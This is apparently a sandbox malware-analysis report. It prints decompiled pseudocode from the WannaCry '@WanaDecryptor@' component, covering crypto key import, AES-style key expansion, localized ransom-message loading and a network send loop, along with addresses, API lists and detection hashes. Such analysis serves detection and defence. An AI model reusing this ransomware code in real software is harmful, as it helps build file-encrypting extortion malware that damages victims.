				_t46 = CreateFileA(_a12, 0x80000000, 1, 0, 3, 0, 0);
				_v44 = _t46;
				if(_t46 == 0xffffffff) {
					L10:
					_push(0xffffffff);
					goto L11;
				} else {
					_t24 = GetFileSize(_t46, 0);
					_t51 = _t24;
					_v40 = _t51;
					if(_t51 != 0xffffffff) {
						if(_t51 <= 0x19000) {
							_t35 = GlobalAlloc(0, _t51);
							_v36 = _t35;
							if(_t35 == 0) {
								goto L10;
							} else {
								if(ReadFile(_t46, _t35, _t51,  &_v32, 0) != 0) {
									_t28 = CryptImportKey(_a4, _t35, _v32, 0, 0, _a8);
									_push(0xffffffff);
									if(_t28 == 0) {
										L11:
										_push( &_v20);
										goto L12;
									} else {
										_push( &_v20);
										L00413056();
										 *[fs:0x0] = _v20;
										return 1;
									}
								} else {
									_push(0xffffffff);
									_push( &_v20);
									goto L12;
								}
							}
						} else {
							_push(0xffffffff);
							_push( &_v20);
							goto L12;
						}
					} else {
						_push(_t24);
						_push( &_v20);
						L12:
						L00413056();
						 *[fs:0x0] = _v20;
						return 0;
					}
				}
			}















                                  0x004049b3
                                  0x004049b5
                                  0x004049ba
                                  0x004049c5
                                  0x004049c6
                                  0x004049d3
                                  0x004049dc
                                  0x004049df
                                  0x004049e2
                                  0x004049fb
                                  0x004049fd
                                  0x00404a03
                                  0x00404ac1
                                  0x00404ac1
                                  0x00000000
                                  0x00404a09
                                  0x00404a0b
                                  0x00404a11
                                  0x00404a13
                                  0x00404a19
                                  0x00404a2b
                                  0x00404a40
                                  0x00404a42
                                  0x00404a47
                                  0x00000000
                                  0x00404a49
                                  0x00404a5a
                                  0x00404a75
                                  0x00404a7d
                                  0x00404a7f
                                  0x00404ac3
                                  0x00404ac6
                                  0x00000000
                                  0x00404a81
                                  0x00404a84
                                  0x00404a85
                                  0x00404a95
                                  0x00404aa2
                                  0x00404aa2
                                  0x00404a5c
                                  0x00404a5c
                                  0x00404a61
                                  0x00000000
                                  0x00404a61
                                  0x00404a5a
                                  0x00404a2d
                                  0x00404a2d
                                  0x00404a32
                                  0x00000000
                                  0x00404a32
                                  0x00404a1b
                                  0x00404a1b
                                  0x00404a1f
                                  0x00404ac7
                                  0x00404ac7
                                  0x00404ad4
                                  0x00404ae1
                                  0x00404ae1
                                  0x00404a19

                                  APIs
                                  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004049F5
                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 00404A0B
                                  • _local_unwind2.MSVCRT ref: 00404AC7
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$CreateSize_local_unwind2
                                  • String ID:
                                  • API String ID: 1039228802-0
                                  • Opcode ID: 90535d59a0f2dbe90f1bf53ea38d3d76a54ffae39caaa8181d17ff2389417ade
                                  • Instruction ID: 027920ce5e1762b5ae47f20262b5a931ea28e629a989eecbafe96ff87ad0b853
                                  • Opcode Fuzzy Hash: 90535d59a0f2dbe90f1bf53ea38d3d76a54ffae39caaa8181d17ff2389417ade
                                  • Instruction Fuzzy Hash: 723153B1A40219BBDB10DF98DC84FFFB6ACE789771F14472AF525A22C0D33859018B68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00406C20 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 72windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 85%
                                  			E00406C20(void* __ecx) {
				void _v51;
				void* _v52;
				signed int _t14;
				void* _t26;
				char* _t30;
				unsigned int _t36;
				signed int _t37;
				void* _t55;

				_t26 = __ecx;
				_v52 = 0;
				memset( &_v51, 0, 0xc << 2);
				asm("stosb");
				_t14 = GetUserDefaultLangID();
				_t30 =  &_v52;
				if(GetLocaleInfoA(_t14 & 0x0000ffff, 0x1001, _t30, 0x32) == 0) {
					asm("repne scasb");
					_t36 =  !(_t30 | 0xffffffff);
					_t55 = "English" - _t36;
					_t37 = _t36 >> 2;
					memcpy(_t55 + _t37 + _t37, _t55, memcpy( &_v52, _t55, _t37 << 2) & 0x00000003);
				}
				if(SendMessageA( *(_t26 + 0x80), 0x158, 0,  &_v52) != 0xffffffff) {
					SendMessageA( *(_t26 + 0x80), 0x14d, 0,  &_v52);
					return E00406AE0(_t26);
				} else {
					SendMessageA( *(_t26 + 0x80), 0x14e, 0, 0);
					return E00406AE0(_t26);
				}
			}











                                  0x00406c25
                                  0x00406c33
                                  0x00406c38
                                  0x00406c3a
                                  0x00406c3b
                                  0x00406c41
                                  0x00406c5b
                                  0x00406c65
                                  0x00406c67
                                  0x00406c71
                                  0x00406c75
                                  0x00406c7f
                                  0x00406c7f
                                  0x00406c9f
                                  0x00406cd4
                                  0x00406ce3
                                  0x00406ca1
                                  0x00406cb1
                                  0x00406cc0
                                  0x00406cc0

                                  APIs
                                  • GetUserDefaultLangID.KERNEL32 ref: 00406C3B
                                  • GetLocaleInfoA.KERNEL32(00000000,00001001,00000000,00000032), ref: 00406C53
                                  • SendMessageA.USER32(?,00000158,00000000,00000000), ref: 00406C9A
                                  • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00406CB1
                                  • SendMessageA.USER32(?,0000014D,00000000,00000000), ref: 00406CD4
                                    • Part of subcall function 00406AE0: #540.MFC42(?,765920C0), ref: 00406B03
                                    • Part of subcall function 00406AE0: #3874.MFC42 ref: 00406B1B
                                    • Part of subcall function 00406AE0: #537.MFC42(msg\), ref: 00406B29
                                    • Part of subcall function 00406AE0: #924.MFC42(?,00000000,m_%s.wnry,msg\), ref: 00406B41
                                    • Part of subcall function 00406AE0: sprintf.MSVCRT ref: 00406B59
                                    • Part of subcall function 00406AE0: #800.MFC42(?,?,765920C0), ref: 00406B62
                                    • Part of subcall function 00406AE0: #800.MFC42 ref: 00406B73
                                    • Part of subcall function 00406AE0: GetFileAttributesA.KERNEL32(?), ref: 00406B7D
                                    • Part of subcall function 00406AE0: #537.MFC42(msg\), ref: 00406B91
                                    • Part of subcall function 00406AE0: #924.MFC42(?,00000000,m_%s.wnry,msg\), ref: 00406BA9
                                    • Part of subcall function 00406AE0: sprintf.MSVCRT ref: 00406BBB
                                    • Part of subcall function 00406AE0: #800.MFC42(?,?,?,?,?,765920C0), ref: 00406BC4
                                    • Part of subcall function 00406AE0: #800.MFC42 ref: 00406BD5
                                    • Part of subcall function 00406AE0: #800.MFC42(?), ref: 00406BF5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #800$MessageSend$#537#924sprintf$#3874#540AttributesDefaultFileInfoLangLocaleUser
                                  • String ID: English
                                  • API String ID: 600832625-3812506524
                                  • Opcode ID: 98bbcc99f84d21185ee3b515649f036d805e480a8587630640b34afead2fff3e
                                  • Instruction ID: 12cb8a10269d81aa60d086da51d7e65d8080bc449a50ca3d57c6290c1d86febe
                                  • Opcode Fuzzy Hash: 98bbcc99f84d21185ee3b515649f036d805e480a8587630640b34afead2fff3e
                                  • Instruction Fuzzy Hash: F911D3717402006BEB149634DC42BAB7795EBD4720F54863EFE5AEB2D0D9F8A8098794
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040A150 Relevance: 9.4, APIs: 6, Instructions: 375COMMONCrypto
                                  Download Yara Rule
                                  C-Code - Quality: 60%
                                  			E0040A150(void* __ecx) {
				void* _t170;
				void* _t177;
				unsigned int _t178;
				intOrPtr _t182;
				signed int _t189;
				signed int _t190;
				signed int _t192;
				signed int* _t198;
				signed int* _t203;
				signed int _t214;
				signed int* _t215;
				signed int _t224;
				void* _t236;
				unsigned int _t238;
				signed int _t239;
				signed int _t245;
				signed int _t251;
				void* _t268;
				void* _t275;
				signed int _t276;
				void* _t278;
				signed int _t290;
				int _t292;
				signed int _t293;
				signed int _t317;
				signed int _t321;
				signed int _t337;
				signed int _t353;
				signed int _t355;
				intOrPtr* _t375;
				signed int _t378;
				void* _t385;
				void* _t386;
				void* _t387;
				signed int _t388;
				signed int* _t390;
				void* _t391;
				void* _t392;
				signed int _t395;
				signed int* _t397;
				intOrPtr _t398;
				void* _t399;
				void* _t403;

				_t236 = __ecx;
				if( *((intOrPtr*)(_t399 + 4)) == 0) {
					 *((intOrPtr*)(_t399 + 0x1c)) = 0x4213b4;
					__imp__??0exception@@QAE@ABQBD@Z(_t399 + 0x18);
					_push(0x41c9c0);
					_push(_t399 + 8);
					L004130FC();
				}
				_t170 =  *(_t399 + 0x20);
				if(_t170 != 0x10 && _t170 != 0x18 && _t170 != 0x20) {
					 *((intOrPtr*)(_t399 + 0x1c)) = 0x4213b4;
					__imp__??0exception@@QAE@ABQBD@Z(_t399 + 0x18);
					_t170 = _t399 + 8;
					_push(0x41c9c0);
					_push(_t170);
					L004130FC();
				}
				_t238 =  *(_t399 + 0x24);
				if(_t238 != 0x10 && _t238 != 0x18 && _t238 != 0x20) {
					 *((intOrPtr*)(_t399 + 0x18)) = 0x4213b4;
					_t238 = _t399 + 0xc;
					__imp__??0exception@@QAE@ABQBD@Z(_t399 + 0x18);
					_push(0x41c9c0);
					_push(_t399 + 8);
					L004130FC();
				}
				 *(_t236 + 0x3c8) = _t170;
				 *(_t236 + 0x3cc) = _t238;
				_t290 = _t238;
				_t385 =  *(_t399 + 0x20);
				_t19 = _t236 + 0x3d0; // 0x424
				_t239 = _t238 >> 2;
				memcpy(_t19, _t385, _t239 << 2);
				_t386 = memcpy(_t385 + _t239 + _t239, _t385, _t290 & 0x00000003);
				_t22 = _t236 + 0x3f0; // 0x444
				_t245 =  *(_t236 + 0x3cc) >> 2;
				memcpy(_t386 + _t245 + _t245, _t386, memcpy(_t22, _t386, _t245 << 2) & 0x00000003);
				_t403 = _t399 + 0x30;
				_t177 =  *(_t236 + 0x3c8);
				if(_t177 == 0x10) {
					_t178 =  *(_t236 + 0x3cc);
					if(_t178 != 0x10) {
						asm("sbb eax, eax");
						_t182 = ( ~(_t178 - 0x18) & 0x00000002) + 0xc;
					} else {
						_t182 = 0xa;
					}
					 *((intOrPtr*)(_t236 + 0x410)) = _t182;
				} else {
					if(_t177 == 0x18) {
						asm("sbb ecx, ecx");
						 *((intOrPtr*)(_t236 + 0x410)) = ( ~( *(_t236 + 0x3cc) - 0x20) & 0xfffffffe) + 0xe;
					} else {
						 *((intOrPtr*)(_t236 + 0x410)) = 0xe;
					}
				}
				asm("cdq");
				_t292 = 0;
				_t251 =  *(_t236 + 0x3cc) + (_t290 & 0x00000003) >> 2;
				 *(_t403 + 0x2c) = _t251;
				if( *((intOrPtr*)(_t236 + 0x410)) < 0) {
					L23:
					_t293 = 0;
					if( *((intOrPtr*)(_t236 + 0x410)) < 0) {
						L28:
						_t44 = _t236 + 0x414; // 0x468
						_t387 = _t44;
						asm("cdq");
						_t353 = ( *((intOrPtr*)(_t236 + 0x410)) + 1) * _t251;
						 *(_t403 + 0x30) = _t353;
						_t189 =  *(_t403 + 0x24);
						_t395 =  *(_t236 + 0x3c8) + (_t293 & 0x00000003) >> 2;
						 *(_t403 + 0x10) = _t395;
						if(_t395 <= 0) {
							L31:
							_t388 = 0;
							if(_t395 <= 0) {
								L35:
								if(_t388 >= _t353) {
									L51:
									_t190 = 1;
									 *(_t403 + 0x30) = 1;
									if( *((intOrPtr*)(_t236 + 0x410)) <= 1) {
										L58:
										 *((char*)(_t236 + 4)) = 1;
										return _t190;
									}
									_t151 = _t236 + 0x208; // 0x25c
									_t397 = _t151;
									do {
										if(_t251 <= 0) {
											goto L57;
										}
										_t390 = _t397;
										_t355 = _t251;
										do {
											_t192 =  *_t390;
											 *(_t403 + 0x24) = _t192;
											_t390 =  &(_t390[1]);
											_t355 = _t355 - 1;
											 *(_t390 - 4) =  *0x004191B0 ^  *0x004195B0 ^  *0x004199B0 ^  *(0x419db0 + (_t192 & 0x000000ff) * 4);
										} while (_t355 != 0);
										_t251 =  *(_t403 + 0x2c);
										L57:
										_t190 =  *(_t403 + 0x30) + 1;
										_t397 =  &(_t397[8]);
										 *(_t403 + 0x30) = _t190;
									} while (_t190 <  *((intOrPtr*)(_t236 + 0x410)));
									goto L58;
								}
								 *(_t403 + 0x28) = 0x41a1b0;
								do {
									 *(_t403 + 0x24) =  *(_t236 + 0x410 + _t395 * 4);
									 *(_t236 + 0x414) =  *(_t236 + 0x414) ^ ((( *0x00416FB0 ^  *( *(_t403 + 0x28))) << 0x00000008 ^ 0) << 0x00000008 ^ 0) << 0x00000008 ^ 0;
									 *(_t403 + 0x28) =  *(_t403 + 0x28) + 1;
									if(_t395 == 8) {
										_t104 = _t236 + 0x418; // 0x46c
										_t198 = _t104;
										_t268 = 3;
										do {
											 *_t198 =  *_t198 ^  *(_t198 - 4);
											_t198 =  &(_t198[1]);
											_t268 = _t268 - 1;
										} while (_t268 != 0);
										 *(_t403 + 0x24) =  *(_t236 + 0x420);
										_t275 = 3;
										 *(_t236 + 0x424) =  *(_t236 + 0x424) ^ (( *0x00416FB0 << 0x00000008 ^ 0) << 0x00000008 ^ 0) << 0x00000008 ^ 0;
										_t116 = _t236 + 0x428; // 0x47c
										_t203 = _t116;
										do {
											 *_t203 =  *_t203 ^  *(_t203 - 4);
											_t203 =  &(_t203[1]);
											_t275 = _t275 - 1;
										} while (_t275 != 0);
										L46:
										 *(_t403 + 0x24) = 0;
										if(_t395 <= 0) {
											goto L50;
										}
										_t119 = _t236 + 0x414; // 0x468
										_t375 = _t119;
										while(1) {
											_t251 =  *(_t403 + 0x2c);
											if(_t388 >=  *(_t403 + 0x30)) {
												goto L51;
											}
											_t398 =  *_t375;
											asm("cdq");
											_t375 = _t375 + 4;
											_t276 = _t388 / _t251;
											asm("cdq");
											_t317 = _t388 %  *(_t403 + 0x2c);
											 *((intOrPtr*)(_t236 + 8 + (_t317 + _t276 * 8) * 4)) = _t398;
											_t395 =  *(_t403 + 0x10);
											_t214 =  *(_t403 + 0x24) + 1;
											_t388 = _t388 + 1;
											 *((intOrPtr*)(_t236 + 0x1e8 + (_t317 + ( *((intOrPtr*)(_t236 + 0x410)) - _t276) * 8) * 4)) =  *((intOrPtr*)(_t375 - 4));
											 *(_t403 + 0x24) = _t214;
											if(_t214 < _t395) {
												continue;
											}
											goto L50;
										}
										goto L51;
									}
									if(_t395 <= 1) {
										goto L46;
									}
									_t101 = _t236 + 0x418; // 0x46c
									_t215 = _t101;
									_t278 = _t395 - 1;
									do {
										 *_t215 =  *_t215 ^  *(_t215 - 4);
										_t215 =  &(_t215[1]);
										_t278 = _t278 - 1;
									} while (_t278 != 0);
									goto L46;
									L50:
									_t251 =  *(_t403 + 0x2c);
								} while (_t388 <  *(_t403 + 0x30));
								goto L51;
							}
							_t58 = _t236 + 0x414; // 0x468
							 *(_t403 + 0x24) = _t58;
							while(_t388 < _t353) {
								asm("cdq");
								_t378 = _t388 / _t251;
								asm("cdq");
								_t321 = _t388 % _t251;
								 *(_t403 + 0x28) = _t321;
								 *((intOrPtr*)(_t236 + 8 + (_t321 + _t378 * 8) * 4)) =  *( *(_t403 + 0x24));
								_t388 = _t388 + 1;
								_t224 =  *(_t403 + 0x24);
								 *((intOrPtr*)(_t236 + 0x1e8 + ( *(_t403 + 0x28) + ( *((intOrPtr*)(_t236 + 0x410)) - _t378) * 8) * 4)) =  *_t224;
								_t353 =  *(_t403 + 0x30);
								 *(_t403 + 0x24) = _t224 + 4;
								if(_t388 < _t395) {
									continue;
								}
								goto L35;
							}
							goto L51;
						}
						 *(_t403 + 0x24) = _t395;
						do {
							_t387 = _t387 + 4;
							 *(_t387 - 4) = 0 << 0x18;
							 *(_t387 - 4) =  *(_t387 - 4) | 0 << 0x00000010;
							_t189 = _t189 + 4;
							_t337 =  *(_t403 + 0x24) - 1;
							 *(_t403 + 0x24) = _t337;
						} while (_t337 != 0);
						goto L31;
					}
					_t38 = _t236 + 0x1e8; // 0x23c
					_t391 = _t38;
					do {
						if(_t251 > 0) {
							memset(_t391, 0, _t251 << 2);
							_t403 = _t403 + 0xc;
							_t251 =  *(_t403 + 0x2c);
						}
						_t293 = _t293 + 1;
						_t391 = _t391 + 0x20;
					} while (_t293 <=  *((intOrPtr*)(_t236 + 0x410)));
					goto L28;
				} else {
					_t33 = _t236 + 8; // 0x5c
					_t392 = _t33;
					do {
						if(_t251 > 0) {
							memset(_t392, 0, _t251 << 2);
							_t403 = _t403 + 0xc;
							_t251 =  *(_t403 + 0x2c);
						}
						_t292 = _t292 + 1;
						_t392 = _t392 + 0x20;
					} while (_t292 <=  *((intOrPtr*)(_t236 + 0x410)));
					goto L23;
				}
			}














































                                  0x0040a15a
                                  0x0040a15c
                                  0x0040a167
                                  0x0040a16f
                                  0x0040a179
                                  0x0040a17e
                                  0x0040a17f
                                  0x0040a17f
                                  0x0040a184
                                  0x0040a18b
                                  0x0040a1a0
                                  0x0040a1a8
                                  0x0040a1ae
                                  0x0040a1b2
                                  0x0040a1b7
                                  0x0040a1b8
                                  0x0040a1b8
                                  0x0040a1bd
                                  0x0040a1c4
                                  0x0040a1d4
                                  0x0040a1dd
                                  0x0040a1e1
                                  0x0040a1eb
                                  0x0040a1f0
                                  0x0040a1f1
                                  0x0040a1f1
                                  0x0040a1f7
                                  0x0040a201
                                  0x0040a208
                                  0x0040a20b
                                  0x0040a20d
                                  0x0040a213
                                  0x0040a216
                                  0x0040a225
                                  0x0040a229
                                  0x0040a22f
                                  0x0040a239
                                  0x0040a239
                                  0x0040a23b
                                  0x0040a244
                                  0x0040a272
                                  0x0040a27b
                                  0x0040a289
                                  0x0040a28e
                                  0x0040a27d
                                  0x0040a27d
                                  0x0040a27d
                                  0x0040a291
                                  0x0040a246
                                  0x0040a249
                                  0x0040a262
                                  0x0040a26a
                                  0x0040a24b
                                  0x0040a24b
                                  0x0040a24b
                                  0x0040a249
                                  0x0040a29d
                                  0x0040a2a3
                                  0x0040a2ad
                                  0x0040a2b2
                                  0x0040a2b6
                                  0x0040a2d7
                                  0x0040a2dd
                                  0x0040a2e1
                                  0x0040a305
                                  0x0040a312
                                  0x0040a312
                                  0x0040a318
                                  0x0040a319
                                  0x0040a31f
                                  0x0040a327
                                  0x0040a32b
                                  0x0040a330
                                  0x0040a334
                                  0x0040a36e
                                  0x0040a36e
                                  0x0040a372
                                  0x0040a3cf
                                  0x0040a3d1
                                  0x0040a576
                                  0x0040a57c
                                  0x0040a583
                                  0x0040a587
                                  0x0040a5f3
                                  0x0040a5f5
                                  0x0040a5fe
                                  0x0040a5fe
                                  0x0040a589
                                  0x0040a589
                                  0x0040a58f
                                  0x0040a591
                                  0x00000000
                                  0x00000000
                                  0x0040a593
                                  0x0040a595
                                  0x0040a597
                                  0x0040a597
                                  0x0040a59b
                                  0x0040a5a5
                                  0x0040a5d3
                                  0x0040a5d4
                                  0x0040a5d4
                                  0x0040a5d9
                                  0x0040a5dd
                                  0x0040a5e7
                                  0x0040a5e8
                                  0x0040a5ed
                                  0x0040a5ed
                                  0x00000000
                                  0x0040a58f
                                  0x0040a3d7
                                  0x0040a3df
                                  0x0040a3e8
                                  0x0040a446
                                  0x0040a44c
                                  0x0040a450
                                  0x0040a478
                                  0x0040a478
                                  0x0040a47e
                                  0x0040a483
                                  0x0040a48a
                                  0x0040a48c
                                  0x0040a48f
                                  0x0040a48f
                                  0x0040a49a
                                  0x0040a4e0
                                  0x0040a4ec
                                  0x0040a4f2
                                  0x0040a4f2
                                  0x0040a4f8
                                  0x0040a4ff
                                  0x0040a501
                                  0x0040a504
                                  0x0040a504
                                  0x0040a507
                                  0x0040a509
                                  0x0040a511
                                  0x00000000
                                  0x00000000
                                  0x0040a513
                                  0x0040a513
                                  0x0040a519
                                  0x0040a51d
                                  0x0040a523
                                  0x00000000
                                  0x00000000
                                  0x0040a527
                                  0x0040a529
                                  0x0040a52c
                                  0x0040a52f
                                  0x0040a533
                                  0x0040a534
                                  0x0040a53b
                                  0x0040a545
                                  0x0040a555
                                  0x0040a556
                                  0x0040a559
                                  0x0040a560
                                  0x0040a564
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040a564
                                  0x00000000
                                  0x0040a519
                                  0x0040a455
                                  0x00000000
                                  0x00000000
                                  0x0040a45b
                                  0x0040a45b
                                  0x0040a461
                                  0x0040a464
                                  0x0040a46b
                                  0x0040a46d
                                  0x0040a470
                                  0x0040a470
                                  0x00000000
                                  0x0040a566
                                  0x0040a56a
                                  0x0040a56e
                                  0x00000000
                                  0x0040a3df
                                  0x0040a374
                                  0x0040a37a
                                  0x0040a37e
                                  0x0040a388
                                  0x0040a38b
                                  0x0040a38f
                                  0x0040a390
                                  0x0040a392
                                  0x0040a39f
                                  0x0040a3af
                                  0x0040a3b3
                                  0x0040a3bc
                                  0x0040a3c3
                                  0x0040a3c9
                                  0x0040a3cd
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040a3cd
                                  0x00000000
                                  0x0040a37e
                                  0x0040a336
                                  0x0040a33a
                                  0x0040a33c
                                  0x0040a344
                                  0x0040a34f
                                  0x0040a366
                                  0x0040a367
                                  0x0040a368
                                  0x0040a368
                                  0x00000000
                                  0x0040a33a
                                  0x0040a2e3
                                  0x0040a2e3
                                  0x0040a2e9
                                  0x0040a2eb
                                  0x0040a2f1
                                  0x0040a2f1
                                  0x0040a2f3
                                  0x0040a2f3
                                  0x0040a2fd
                                  0x0040a2fe
                                  0x0040a301
                                  0x00000000
                                  0x0040a2b8
                                  0x0040a2b8
                                  0x0040a2b8
                                  0x0040a2bb
                                  0x0040a2bd
                                  0x0040a2c3
                                  0x0040a2c3
                                  0x0040a2c5
                                  0x0040a2c5
                                  0x0040a2cf
                                  0x0040a2d0
                                  0x0040a2d3
                                  0x00000000
                                  0x0040a2bb

                                  APIs
                                  • ??0exception@@QAE@ABQBD@Z.MSVCRT ref: 0040A16F
                                  • _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040A17F
                                  • ??0exception@@QAE@ABQBD@Z.MSVCRT(?), ref: 0040A1A8
                                  • _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040A1B8
                                  • ??0exception@@QAE@ABQBD@Z.MSVCRT(?), ref: 0040A1E1
                                  • _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040A1F1
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ??0exception@@ExceptionThrow
                                  • String ID:
                                  • API String ID: 941485209-0
                                  • Opcode ID: 1e118166748c2516ccf34b16e56ce24d223970c5c76bb6d30bfc94f2d512404d
                                  • Instruction ID: fb0ef9a6f766abd1277d4fb3e7775c965cb771230ee66441beda5a672c207522
                                  • Opcode Fuzzy Hash: 1e118166748c2516ccf34b16e56ce24d223970c5c76bb6d30bfc94f2d512404d
                                  • Instruction Fuzzy Hash: 57E1E4716043458BD718CF29C4906AAB7E2BFCC308F09857EE889EB355DB34D941CB5A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040D300 Relevance: 6.2, APIs: 4, Instructions: 159COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 96%
                                  			E0040D300(intOrPtr* __ecx, void* _a4, void* _a8, void* _a12, void* _a16) {
				void _v1024;
				char _v1028;
				intOrPtr _v1032;
				intOrPtr _v1036;
				void* _v1040;
				intOrPtr _v1044;
				char _v1048;
				signed int _t34;
				void* _t36;
				intOrPtr _t37;
				void* _t43;
				void* _t45;
				intOrPtr _t46;
				void* _t49;
				signed int _t58;
				intOrPtr* _t60;
				signed int _t70;
				signed int _t71;
				signed int _t78;
				void* _t83;
				void* _t91;
				void* _t102;
				void* _t103;
				void* _t104;
				void* _t105;
				void** _t107;
				void** _t109;

				_t106 =  &_v1040;
				_t105 = _a8;
				_t60 = __ecx;
				_v1032 = 0;
				if(_t105 != 0) {
					_t34 = E0040D5D0(__ecx);
					__eflags = _t34;
					if(_t34 != 0) {
						__eflags = _a12;
						if(_a12 == 0) {
							_t36 = _a4;
							_v1040 = _t36;
							_t91 = _t36;
							goto L13;
						} else {
							__eflags = _a16;
							if(_a16 != 0) {
								__eflags = _t105 - 0x400;
								if(_t105 > 0x400) {
									_t49 = E00412A90(_t105);
									_t109 =  &(( &_v1040)[1]);
									_v1040 = _t49;
									__eflags = _t49;
									if(_t49 != 0) {
										_t103 = _a4;
										_t70 = _t105;
										_t71 = _t70 >> 2;
										memcpy(_t49, _t103, _t71 << 2);
										memcpy(_t103 + _t71 + _t71, _t103, _t70 & 0x00000003);
										_t106 =  &(_t109[6]);
										_t91 = _v1040;
										E0040D2B0(_t60, _t91, _t105);
										goto L13;
									} else {
										return _t49;
									}
								} else {
									_t104 = _a4;
									_t78 = _t105 >> 2;
									memcpy(_t104 + _t78 + _t78, _t104, memcpy( &_v1024, _t104, _t78 << 2) & 0x00000003);
									_t106 =  &(( &_v1040)[6]);
									_t83 =  &_v1024;
									_t91 = _t83;
									_v1040 = _t83;
									E0040D2B0(_t60, _t91, _t105);
									goto L13;
								}
							} else {
								_t91 = _a4;
								E0040D2B0(__ecx, _t91, _t105);
								L13:
								_push( &_v1028);
								L0041303E();
								_t37 = _v1028;
								_t107 =  &(_t106[1]);
								_t102 = 0;
								_v1036 = _t37;
								__eflags = _t105;
								if(_t105 > 0) {
									while(1) {
										__eflags = _t37 - _v1028 -  *((intOrPtr*)(_t60 + 0x28));
										if(_t37 - _v1028 >  *((intOrPtr*)(_t60 + 0x28))) {
											goto L25;
										}
										_t43 =  *((intOrPtr*)( *_t60 + 0x20))( *((intOrPtr*)(_t60 + 4)), _t91 + _t102, _t105 - _t102);
										__eflags = _t43;
										if(__eflags > 0) {
											_t102 = _t102 + _t43;
											__eflags = _t102;
											_push( &_v1048);
											goto L24;
										} else {
											if(__eflags != 0) {
												_t45 =  *((intOrPtr*)( *_t60 + 0x28))();
												__eflags = _t45 - 0x2733;
												if(_t45 == 0x2733) {
													_t46 = _v1044;
													__eflags = _t46 - 0x64;
													_v1044 = _t46 + 1;
													if(_t46 > 0x64) {
														Sleep(0x64);
														_v1044 = 0;
													}
													_push( &_v1048);
													L24:
													L0041303E();
													_t107 =  &(_t107[1]);
													__eflags = _t102 - _t105;
													if(_t102 < _t105) {
														_t37 = _v1048;
														continue;
													}
												}
											}
										}
										goto L25;
									}
								}
								L25:
								__eflags = _t91 - _a4;
								if(_t91 != _a4) {
									__eflags = _t91 -  &_v1024;
									if(_t91 !=  &_v1024) {
										__eflags = _t91;
										if(_t91 != 0) {
											free(_t91);
										}
									}
								}
								return _t102;
							}
						}
					} else {
						_t58 = _t34 | 0xffffffff;
						__eflags = _t58;
						return _t58;
					}
				} else {
					return 0;
				}
			}






























                                  0x0040d300
                                  0x0040d308
                                  0x0040d313
                                  0x0040d315
                                  0x0040d31d
                                  0x0040d330
                                  0x0040d335
                                  0x0040d337
                                  0x0040d350
                                  0x0040d352
                                  0x0040d3f6
                                  0x0040d3fd
                                  0x0040d401
                                  0x00000000
                                  0x0040d358
                                  0x0040d35f
                                  0x0040d361
                                  0x0040d378
                                  0x0040d37e
                                  0x0040d3b1
                                  0x0040d3b6
                                  0x0040d3b9
                                  0x0040d3bd
                                  0x0040d3bf
                                  0x0040d3ce
                                  0x0040d3d5
                                  0x0040d3db
                                  0x0040d3de
                                  0x0040d3e6
                                  0x0040d3e6
                                  0x0040d3e8
                                  0x0040d3ef
                                  0x00000000
                                  0x0040d3cb
                                  0x0040d3cb
                                  0x0040d3cb
                                  0x0040d380
                                  0x0040d380
                                  0x0040d38f
                                  0x0040d39a
